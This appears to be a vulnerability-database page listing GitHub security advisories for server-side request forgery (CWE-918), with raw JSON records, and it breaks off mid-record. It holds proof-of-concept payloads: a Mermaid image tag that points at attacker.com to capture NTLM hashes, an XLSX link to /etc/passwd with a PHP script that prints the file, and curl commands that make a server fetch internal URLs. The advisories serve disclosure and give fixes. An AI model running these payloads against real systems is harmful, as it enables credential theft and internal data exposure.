Common Weakness Enumeration

CWE-918

Allowed

Server-Side Request Forgery (SSRF)

Abstraction: Base · Status: Incomplete

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

4606 vulnerabilities reference this CWE, most recent first.

GHSA-W95V-4H65-J455

Vulnerability from github – Published: 2026-04-10 19:21 – Updated: 2026-04-10 19:21
VLAI
Summary
SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
Details

SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.

On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.

Root Cause

Mermaid initialization at app/src/protyle/render/mermaidRender.ts lines 28 and 33:

mermaid.initialize({
    securityLevel: "loose",
    flowchart: {
        htmlLabels: true,
    },
});

SVG injection at line 101:

renderElement.lastElementChild.innerHTML = mermaidData.svg;

No DOMPurify or other sanitization between the Mermaid output and DOM insertion.

Mermaid v11.12.0 in "loose" mode strips active JavaScript (<script>, onerror, onload) but explicitly allows <img> tags with src attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.

The Electron main process at app/electron/main.js line 78 sets disable-web-security, and lines 319+ set webSecurity: false, nodeIntegration: true, contextIsolation: false on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.

Proof of Concept

Mermaid code block in a SiYuan note:

```mermaid
graph TD
    A["<img src='//attacker.com/share/img.png'>"] --> B[Normal Node]
```

Rendered SVG output (verified with Mermaid CLI 11.12.0, securityLevel: "loose", htmlLabels: true):

<foreignObject>
  <div xmlns="http://www.w3.org/1999/xhtml">
    <span class="nodeLabel">
      <p><img src="//attacker.com/share/img.png" style="..."></p>
    </span>
  </div>
</foreignObject>

What was stripped by Mermaid's internal sanitizer (verified): onerror, onload, all event handler attributes, <script> tags, file:// URLs.

What survived (verified): <img src="http://...">, <img src="//...">.

Attack steps: 1. Attacker creates a note or .sy export containing the Mermaid block above 2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger) 3. Victim imports the notebook or opens the shared note 4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML 5. Electron fetches //attacker.com/share/img.png

On Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker's SMB server.

On macOS/Linux: Electron makes an HTTP request to the attacker's server, leaking the victim's IP and confirming when the note was read.

Impact

Zero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim's machine.

No configuration changes required. The securityLevel: "loose" setting is hardcoded in SiYuan's Mermaid initialization.

Suggested Fix

Change Mermaid initialization to securityLevel: "strict". If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip <img> tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260407035653-2f416e5253f1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40107"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T19:21:44Z",
    "nvd_published_at": "2026-04-09T21:16:12Z",
    "severity": "HIGH"
  },
  "details": "SiYuan configures Mermaid.js with `securityLevel: \"loose\"` and `htmlLabels: true`. In this mode, `\u003cimg\u003e` tags with `src` attributes survive Mermaid\u0027s internal DOMPurify and land in SVG `\u003cforeignObject\u003e` blocks. The SVG is injected via `innerHTML` with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.\n\nOn Windows, a protocol-relative URL (`//attacker.com/image.png`) resolves as a UNC path (`\\\\attacker.com\\image.png`). Windows attempts SMB authentication automatically, sending the victim\u0027s NTLMv2 hash to the attacker.\n\n## Root Cause\n\nMermaid initialization at `app/src/protyle/render/mermaidRender.ts` lines 28 and 33:\n\n    mermaid.initialize({\n        securityLevel: \"loose\",\n        flowchart: {\n            htmlLabels: true,\n        },\n    });\n\nSVG injection at line 101:\n\n    renderElement.lastElementChild.innerHTML = mermaidData.svg;\n\nNo DOMPurify or other sanitization between the Mermaid output and DOM insertion.\n\nMermaid v11.12.0 in \"loose\" mode strips active JavaScript (`\u003cscript\u003e`, `onerror`, `onload`) but explicitly allows `\u003cimg\u003e` tags with `src` attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.\n\nThe Electron main process at `app/electron/main.js` line 78 sets `disable-web-security`, and lines 319+ set `webSecurity: false`, `nodeIntegration: true`, `contextIsolation: false` on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.\n\n## Proof of Concept\n\nMermaid code block in a SiYuan note:\n\n    ```mermaid\n    graph TD\n        A[\"\u003cimg src=\u0027//attacker.com/share/img.png\u0027\u003e\"] --\u003e B[Normal Node]\n    ```\n\nRendered SVG output (verified with Mermaid CLI 11.12.0, `securityLevel: \"loose\"`, `htmlLabels: true`):\n\n    \u003cforeignObject\u003e\n      \u003cdiv xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\n        \u003cspan class=\"nodeLabel\"\u003e\n          \u003cp\u003e\u003cimg src=\"//attacker.com/share/img.png\" style=\"...\"\u003e\u003c/p\u003e\n        \u003c/span\u003e\n      \u003c/div\u003e\n    \u003c/foreignObject\u003e\n\nWhat was stripped by Mermaid\u0027s internal sanitizer (verified): `onerror`, `onload`, all event handler attributes, `\u003cscript\u003e` tags, `file://` URLs.\n\nWhat survived (verified): `\u003cimg src=\"http://...\"\u003e`, `\u003cimg src=\"//...\"\u003e`.\n\nAttack steps:\n1. Attacker creates a note or .sy export containing the Mermaid block above\n2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger)\n3. Victim imports the notebook or opens the shared note\n4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML\n5. Electron fetches `//attacker.com/share/img.png`\n\nOn Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker\u0027s SMB server.\n\nOn macOS/Linux: Electron makes an HTTP request to the attacker\u0027s server, leaking the victim\u0027s IP and confirming when the note was read.\n\n## Impact\n\nZero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim\u0027s machine.\n\nNo configuration changes required. The `securityLevel: \"loose\"` setting is hardcoded in SiYuan\u0027s Mermaid initialization.\n\n## Suggested Fix\n\nChange Mermaid initialization to `securityLevel: \"strict\"`. If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip `\u003cimg\u003e` tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.",
  "id": "GHSA-w95v-4h65-j455",
  "modified": "2026-04-10T19:21:44Z",
  "published": "2026-04-10T19:21:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40107"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering"
}

GHSA-W968-MX3G-7GRF

Vulnerability from github – Published: 2025-10-08 18:30 – Updated: 2025-10-08 18:30
VLAI
Details

Server-Side Request Forgery (SSRF) in the Remote Browser Plugin in Sonatype Nexus Repository 2.x up to and including 2.15.2 allows unauthenticated remote attackers to exfiltrate proxy repository credentials via crafted HTTP requests.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-9868"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-08T18:15:35Z",
    "severity": "HIGH"
  },
  "details": "Server-Side Request Forgery (SSRF) in the Remote Browser Plugin in Sonatype Nexus Repository 2.x up to and including 2.15.2 allows unauthenticated remote attackers to exfiltrate proxy repository credentials via crafted HTTP requests.",
  "id": "GHSA-w968-mx3g-7grf",
  "modified": "2025-10-08T18:30:16Z",
  "published": "2025-10-08T18:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9868"
    },
    {
      "type": "WEB",
      "url": "https://support.sonatype.com/hc/en-us/articles/45363201583635"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-W96F-MFJ2-5P98

Vulnerability from github – Published: 2025-03-01 18:30 – Updated: 2025-03-01 18:30
VLAI
Details

A vulnerability, which was classified as critical, was found in Zorlan SkyCaiji 2.9. This affects the function previewAction of the file vendor/skycaiji/app/admin/controller/Tool.php. The manipulation of the argument data leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1799"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-01T18:15:34Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as critical, was found in Zorlan SkyCaiji 2.9. This affects the function previewAction of the file vendor/skycaiji/app/admin/controller/Tool.php. The manipulation of the argument data leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-w96f-mfj2-5p98",
  "modified": "2025-03-01T18:30:40Z",
  "published": "2025-03-01T18:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1799"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sheratan4/cve/issues/6"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.298029"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.298029"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.502650"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-W9VR-RGWG-C56X

Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-05-24 19:12
VLAI
Details

The vRealize Operations Manager API (8.x prior to 8.5) contains a Server Side Request Forgery in an end point. An unauthenticated malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack leading to information disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-22026"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-30T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "The vRealize Operations Manager API (8.x prior to 8.5) contains a Server Side Request Forgery in an end point. An unauthenticated malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack leading to information disclosure.",
  "id": "GHSA-w9vr-rgwg-c56x",
  "modified": "2022-05-24T19:12:29Z",
  "published": "2022-05-24T19:12:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22026"
    },
    {
      "type": "WEB",
      "url": "https://www.vmware.com/security/advisories/VMSA-2021-0018.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-W9XV-QF98-CCQ4

Vulnerability from github – Published: 2024-10-07 15:58 – Updated: 2025-03-06 18:13
VLAI
Summary
PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery in HTML writer when embedding images is enabled
Details

Summary

It's possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in HTML writer with $writer->setEmbedImages(true); those files will be included in the output as data: URLs, regardless of the file's type. Also URLs can be used for embedding, resulting in a Server-Side Request Forgery vulnerability.

Details

XLSX files allow embedding or linking media. When

In xl/drawings/drawing1.xml an attacker can do e.g.:

<a:blip cstate="print" r:link="rId1" />

And then, in xl/drawings/_rels/drawing1.xml.rels they can set the path to anything, such as:

<Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="/etc/passwd" />

or

<Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="http://example.org" />

When the HTML writer is outputting the image, it does not check the path in any way. Also the getimagesize() call does not mitigate this, because when getimagesize() returns false, an empty mime type is used.

if ($this->embedImages || str_starts_with($imageData, 'zip://')) {
    $picture = @file_get_contents($filename);
    if ($picture !== false) {
        $imageDetails = getimagesize($filename) ?: ['mime' => ''];
        // base64 encode the binary data
        $base64 = base64_encode($picture);
        $imageData = 'data:' . $imageDetails['mime'] . ';base64,' . $base64;
    }
}

$html .= '<img style="position: absolute; z-index: 1; left: '
    . $drawing->getOffsetX() . 'px; top: ' . $drawing->getOffsetY() . 'px; width: '
    . $drawing->getWidth() . 'px; height: ' . $drawing->getHeight() . 'px;" src="'
    . $imageData . '" alt="' . $filedesc . '" />';

PoC

<?php

require 'vendor/autoload.php';

$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader->load(__DIR__ . '/book.xlsx');

$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
$writer->setEmbedImages(true);
$output = $writer->generateHTMLAll();

// The below is just for demo purposes

$pattern = '/data:;base64,(?<data>[^"]+)/i';

preg_match_all($pattern, $output, $matches);

print("*** /etc/passwd content: ***\n");
print(base64_decode($matches['data'][0]));

print("*** HTTP response content: ***\n");
print(base64_decode($matches['data'][1]));

Add this file in the same directory: book.xlsx

Run with: php index.php

Impact

When embedding images has been enabled, an attacker can read arbitrary files on the server and perform arbitrary HTTP GET requests, potentially e.g. revealing secrets. Note that any PHP protocol wrappers can be used, meaning that if for example the expect:// wrapper is enabled, also remote code execution is possible.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpexcel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45291"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-07T15:58:06Z",
    "nvd_published_at": "2024-10-07T21:15:17Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nIt\u0027s possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in HTML writer with `$writer-\u003esetEmbedImages(true);` those files will be included in the output as `data:` URLs, regardless of the file\u0027s type. Also URLs can be used for embedding, resulting in a Server-Side Request Forgery vulnerability.\n\n### Details\n\nXLSX files allow embedding or linking media. When \n\nIn `xl/drawings/drawing1.xml` an attacker can do e.g.:\n```xml\n\u003ca:blip cstate=\"print\" r:link=\"rId1\" /\u003e\n```\n\nAnd then, in `xl/drawings/_rels/drawing1.xml.rels` they can set the path to anything, such as:\n```xml\n\u003cRelationship Id=\"rId1\"\n    Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image\"\n    Target=\"/etc/passwd\" /\u003e\n```\nor\n```xml\n\u003cRelationship Id=\"rId1\"\n    Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image\"\n    Target=\"http://example.org\" /\u003e\n```\n\nWhen the HTML writer is outputting the image, it does not check the path in any way. Also the `getimagesize()` call does not mitigate this, because when `getimagesize()` returns false, an empty mime type is used.\n\n```php\nif ($this-\u003eembedImages || str_starts_with($imageData, \u0027zip://\u0027)) {\n    $picture = @file_get_contents($filename);\n    if ($picture !== false) {\n        $imageDetails = getimagesize($filename) ?: [\u0027mime\u0027 =\u003e \u0027\u0027];\n        // base64 encode the binary data\n        $base64 = base64_encode($picture);\n        $imageData = \u0027data:\u0027 . $imageDetails[\u0027mime\u0027] . \u0027;base64,\u0027 . $base64;\n    }\n}\n\n$html .= \u0027\u003cimg style=\"position: absolute; z-index: 1; left: \u0027\n    . $drawing-\u003egetOffsetX() . \u0027px; top: \u0027 . $drawing-\u003egetOffsetY() . \u0027px; width: \u0027\n    . $drawing-\u003egetWidth() . \u0027px; height: \u0027 . $drawing-\u003egetHeight() . \u0027px;\" src=\"\u0027\n    . $imageData . \u0027\" alt=\"\u0027 . $filedesc . \u0027\" /\u003e\u0027;\n```\n\n### PoC\n\n```php\n\u003c?php\n\nrequire \u0027vendor/autoload.php\u0027;\n\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader(\"Xlsx\");\n$spreadsheet = $reader-\u003eload(__DIR__ . \u0027/book.xlsx\u0027);\n\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\n$writer-\u003esetEmbedImages(true);\n$output = $writer-\u003egenerateHTMLAll();\n\n// The below is just for demo purposes\n\n$pattern = \u0027/data:;base64,(?\u003cdata\u003e[^\"]+)/i\u0027;\n\npreg_match_all($pattern, $output, $matches);\n\nprint(\"*** /etc/passwd content: ***\\n\");\nprint(base64_decode($matches[\u0027data\u0027][0]));\n\nprint(\"*** HTTP response content: ***\\n\");\nprint(base64_decode($matches[\u0027data\u0027][1]));\n```\n\nAdd this file in the same directory:\n[book.xlsx](https://github.com/PHPOffice/PhpSpreadsheet/files/15213066/book.xlsx)\n\nRun with:\n`php index.php`\n\n### Impact\n\nWhen embedding images has been enabled, an attacker can read arbitrary files on the server and perform arbitrary HTTP GET requests, potentially e.g. [revealing secrets](https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/). Note that any PHP protocol wrappers can be used, meaning that if for example the `expect://` wrapper is enabled, also remote code execution is possible.",
  "id": "GHSA-w9xv-qf98-ccq4",
  "modified": "2025-03-06T18:13:21Z",
  "published": "2024-10-07T15:58:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-w9xv-qf98-ccq4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45291"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/a9693d1182df6695c14bc5d74315ac71a3398e5a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/d95bc290beb137d4118095b96f62ec47e0205cec"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/e04ed222b36fd5fd6fed0c10c765c2b68effb465"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery in HTML writer when embedding images is enabled"
}

GHSA-WC2V-P2CH-RF7V

Vulnerability from github – Published: 2022-05-24 19:16 – Updated: 2022-05-24 19:16
VLAI
Details

Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sj() method.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-21653"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-06T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \\controller\\index.php, which can be exploited via the sj() method.",
  "id": "GHSA-wc2v-p2ch-rf7v",
  "modified": "2022-05-24T19:16:59Z",
  "published": "2022-05-24T19:16:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-21653"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lolipop1234/XXD/issues/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-WC4H-2348-JC3P

Vulnerability from github – Published: 2026-04-03 03:30 – Updated: 2026-04-06 23:41
VLAI
Summary
Ech0 has Unauthenticated Server-Side Request Forgery in Website Preview Feature
Details

Summary

Ech0 implements link preview (editor fetches a page title) through GET /api/website/title. That is legitimate product behavior, but the implementation is unsafe: the route is unauthenticated, accepts a fully attacker-controlled URL, performs a server-side GET, reads the entire response body into memory (io.ReadAll). There is no host allowlist, no SSRF filter, and InsecureSkipVerify: true on the outbound client.

Attacker outcome : Anyone who can reach the instance can force the Ech0 server to open HTTP/HTTPS URLs of their choice as seen from the server’s network position (Docker bridge, VPC, localhost from the process view). Go’s default http.Client follows redirects (unless disabled). Redirect chains can move the server-side request from an allowed-looking host to an internal target; the code does not disable this in SendRequest.

Affected Components

Ech0 codebase:

  • internal/handler/common/common.go
    Handles the /api/website/title endpoint and accepts user-controlled URL input.

  • internal/service/common/common.go
    Processes the request and invokes the outbound HTTP fetch (GetWebsiteTitle).

  • internal/util/http/http.go
    Performs the HTTP request (SendRequest) with the following insecure configurations:

  • No URL validation or allowlist
  • Redirects enabled (default client behavior)
  • InsecureSkipVerify: true

PoC

Environment: Ech0 listening on http://127.0.0.1:6277 (e.g. Docker image sn0wl1n/ech0:latest). No cookies or Authorization header.

Step 1 — baseline: unauthenticated server-side fetch (public URL):

curl.exe -sS -m 20 "http://127.0.0.1:6277/api/website/title?website_url=https://example.com"

Observed result (verified): HTTP 200, JSON with code: 1 and data Example Domain — proves the Ech0 process performed an outbound GET without any client auth.

Step 2 — impact: host-bound page + recorded leak (repo PoC file) Committed PoC page: poc_ssrf_proof.html

  1. From poc file directory, listen on 0.0.0.0 (port 9999):
python -m http.server 9999 --bind 0.0.0.0
  1. Docker Desktop (Windows / macOS): Ech0 in Docker fetches the host via host.docker.internal:
curl.exe -sS -m 20 "http://127.0.0.1:6277/api/website/title?website_url=http://host.docker.internal:9999/poc_ssrf_proof.html"

Recorded response (verified this workspace, Ech0 4.2.2 in Docker):

{"code":1,"msg":"获取网站标题成功","data":"ECH0_SSRF_POC_LEAK_2026"}

Python server log: GET /poc_ssrf_proof.html200 (proves the server/container pulled the page from your host).

Leak channel: the backend reads the full HTML body before parsing (see io.ReadAll in SendRequest).

Impact

  • Verified: Unauthenticated callers can make the Ech0 process issue server-side HTTP(S) requests to internal/reserved targets reachable from that process (PoC Step 2: host-reachable listener reflected in JSON).
  • Code-level: The full response is read into memory (io.ReadAll); only the title string is returned. Combined with default HTTP redirect following (standard http.Client behavior; not disabled here), the effective request graph is larger than a single URL.
  • TLS: InsecureSkipVerify: true means misissued or intercepted TLS to internal HTTPS services is still accepted from the server’s perspective.
  • Deployment-dependent: Where routing allows (typical cloud VMs), 169.254.169.254-class endpoints are in scope for the same code path; treat as *high.
  • DOS(Denial of Service): reading the whole body into memory with io.ReadAll is a DoS vector if you point it at a massive file.

Remediation

  • Enforce SSRF-safe URL policy: allow only needed schemes/hosts; block link-local, metadata, and loopback unless explicitly required.
  • Remove InsecureSkipVerify; use normal TLS verification.
  • Limit redirects (disable or cap hops; re-validate each target).
  • Add response size / timeout limits; optionally restrict egress at the network layer.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lin-snow/ech0"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.8-0.20260401031029-4ca56fea5ba4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35036"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T03:30:53Z",
    "nvd_published_at": "2026-04-06T17:17:12Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nEch0 implements **link preview** (editor fetches a page title) through **`GET /api/website/title`**. That is **legitimate product behavior**, but the implementation is **unsafe**: the route is **unauthenticated**, accepts a **fully attacker-controlled URL**, performs a **server-side GET**, reads the **entire response body** into memory (`io.ReadAll`). There is **no** host allowlist, **no** SSRF filter, and **`InsecureSkipVerify: true`** on the outbound client.\n\n**Attacker outcome :** Anyone who can reach the instance can **force the Ech0 server** to open **HTTP/HTTPS URLs of their choice** as seen from the **server\u2019s network position** (Docker bridge, VPC, localhost from the process view). \nGo\u2019s default `http.Client` **follows redirects** (unless disabled). Redirect chains can move the server-side request from an allowed-looking host to an internal target; the code does not disable this in `SendRequest`.\n\n### Affected Components\n\n**Ech0 codebase:**\n\n- `internal/handler/common/common.go`  \n  Handles the `/api/website/title` endpoint and accepts user-controlled URL input.\n\n- `internal/service/common/common.go`  \n  Processes the request and invokes the outbound HTTP fetch (`GetWebsiteTitle`).\n\n- `internal/util/http/http.go`  \n  Performs the HTTP request (`SendRequest`) with the following insecure configurations:\n  - No URL validation or allowlist\n  - Redirects enabled (default client behavior)\n  - `InsecureSkipVerify: true`\n\n### PoC \n\n**Environment:** Ech0 listening on `http://127.0.0.1:6277` (e.g. Docker image `sn0wl1n/ech0:latest`). No cookies or `Authorization` header.\n\n**Step 1 \u2014 baseline: unauthenticated server-side fetch (public URL):**\n\n```bash\ncurl.exe -sS -m 20 \"http://127.0.0.1:6277/api/website/title?website_url=https://example.com\"\n```\n\n**Observed result (verified):** HTTP 200, JSON with `code: 1` and `data` **`Example Domain`** \u2014 proves the **Ech0 process** performed an outbound GET without any client auth.\n\n**Step 2 \u2014 impact: host-bound page + recorded leak (repo PoC file)**\nCommitted PoC page: **`poc_ssrf_proof.html`** \n\n1. From **`poc file directory`**, listen on **0.0.0.0** (port **9999**):\n\n```bash\npython -m http.server 9999 --bind 0.0.0.0\n```\n\n2. **Docker Desktop (Windows / macOS):** Ech0 in Docker fetches the host via `host.docker.internal`:\n\n```bash\ncurl.exe -sS -m 20 \"http://127.0.0.1:6277/api/website/title?website_url=http://host.docker.internal:9999/poc_ssrf_proof.html\"\n```\n\n**Recorded response (verified this workspace, Ech0 4.2.2 in Docker):**\n\n```json\n{\"code\":1,\"msg\":\"\u83b7\u53d6\u7f51\u7ad9\u6807\u9898\u6210\u529f\",\"data\":\"ECH0_SSRF_POC_LEAK_2026\"}\n```\n\n**Python server log:** `GET /poc_ssrf_proof.html` \u2192 **200** (proves the **server/container** pulled the page from your host).\n\n**Leak channel:** the backend **reads the full HTML body** before parsing (see `io.ReadAll` in `SendRequest`).\n\n\n### Impact\n\n- **Verified:** Unauthenticated callers can make the Ech0 process issue **server-side HTTP(S) requests** to **internal/reserved targets** reachable from that process (PoC Step 2: host-reachable listener reflected in JSON).\n- **Code-level:** The full response is **read into memory** (`io.ReadAll`); only the title string is returned. Combined with **default HTTP redirect following** (standard `http.Client` behavior; not disabled here), the effective request graph is larger than a single URL.\n- **TLS:** `InsecureSkipVerify: true` means **misissued or intercepted TLS** to internal HTTPS services is still accepted from the server\u2019s perspective.\n- **Deployment-dependent:** Where routing allows (typical cloud VMs), **`169.254.169.254`-class** endpoints are in scope for the **same code path**; treat as **high*.\n- 